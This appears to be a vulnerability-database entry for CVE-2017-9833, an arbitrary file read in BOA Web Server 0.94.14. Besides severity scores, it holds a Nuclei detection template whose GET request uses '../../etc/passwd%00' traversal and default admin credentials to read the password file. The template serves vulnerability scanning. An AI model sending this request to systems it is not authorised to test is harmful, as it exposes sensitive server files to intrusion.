Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-9833
HistoryMar 06, 2022 - 10:58 p.m.

BOA Web Server 0.94.14 - Arbitrary File Access

2022-03-0622:58:38
ProjectDiscovery
github.com
6

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

0.735 High

EPSS

Percentile

98.1%

BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of “…/…” using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.

id: CVE-2017-9833

info:
  name: BOA Web Server 0.94.14 - Arbitrary File Access
  author: 0x_Akoko
  severity: high
  description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.
  impact: |
    An attacker can gain unauthorized access to sensitive files on the server.
  remediation: |
    Upgrade to a patched version of BOA Web Server or apply the necessary security patches.
  reference:
    - https://www.exploit-db.com/exploits/42290
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9833
    - https://pastebin.com/raw/rt7LJvyF
    - https://www.exploit-db.com/exploits/42290/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-9833
    cwe-id: CWE-22
    epss-score: 0.7354
    epss-percentile: 0.98104
    cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: boa
    product: boa
  tags: cve,cve2017,boa,lfr,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100becb5b5f455cc2352342a916d40b8b3e767f4bb590ec0663ab0c43a8209036aa02207064fc85e40379fbe38b9715412a026a67a8c3556926dec684adb5320f215f33:922c64590222798bb761d5b6d8e72950

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

0.735 High

EPSS

Percentile

98.1%